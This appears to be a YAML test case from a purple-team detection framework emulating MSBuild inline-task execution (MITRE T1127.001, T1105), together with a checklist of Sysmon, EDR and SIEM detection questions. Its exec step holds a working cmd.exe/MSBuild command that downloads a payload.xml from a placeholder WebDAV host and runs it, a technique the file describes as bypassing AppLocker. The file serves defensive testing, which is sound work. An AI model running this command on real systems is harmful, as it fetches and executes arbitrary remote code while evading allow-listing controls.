id: DLEXEC_011_msbuild_inline
name: "Download and Execute — MSBuild Inline Task from WebDAV"
mitre: "T1127.001, T1105"
category: download_execute
description: >
  Uses MSBuild.exe to download and execute a remote XML project file containing
  an inline C# task from a WebDAV share. MSBuild is a trusted Microsoft binary
  that can compile and execute arbitrary C# code at runtime, bypassing AppLocker.
  Replace all PLACEHOLDER values.

requirements:
  os: windows
  admin: false

steps:
  - type: marker
    message: "[DLEXEC-011] MSBuild remote XML inline task execution"

  - type: exec
    binary: cmd.exe
    args: /V /c "set MB=C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe & !MB! /noautoresponse /preprocess \\PLACEHOLDER_WEBDAV_HOST\PLACEHOLDER_FOLDER\payload.xml > C:\Windows\Temp\payload.xml & !MB! C:\Windows\Temp\payload.xml"
    timeout_seconds: 60

  - type: sleep
    seconds: 30

  - type: marker
    message: "[DLEXEC-011] Cleanup"

  - type: file_delete
    path: "C:\\Windows\\Temp\\payload.xml"

analyst_checklist:
  - "Sysmon Event ID 1: MSBuild.exe spawned from cmd.exe with remote XML path?"
  - "Sysmon Event ID 3: Network connection from MSBuild.exe or cmd.exe to WebDAV host?"
  - "Sysmon Event ID 11: payload.xml written to Temp — captured?"
  - "EDR: Alert on MSBuild.exe executing from user-writable path or remote share?"
  - "EDR: MSBuild.exe child processes captured — what did the inline task spawn?"
  - "SIEM: MSBuild.exe process events present and queryable?"
  - "Rule opportunity: MSBuild.exe loading project file from Temp, AppData, or UNC path"
  - "Rule opportunity: MSBuild.exe making outbound network connection"
  - "Rule opportunity: MSBuild.exe spawning any unexpected child process"
  - "Gap check: MSBuild inline tasks compile C# at runtime — file scanning won't catch this."
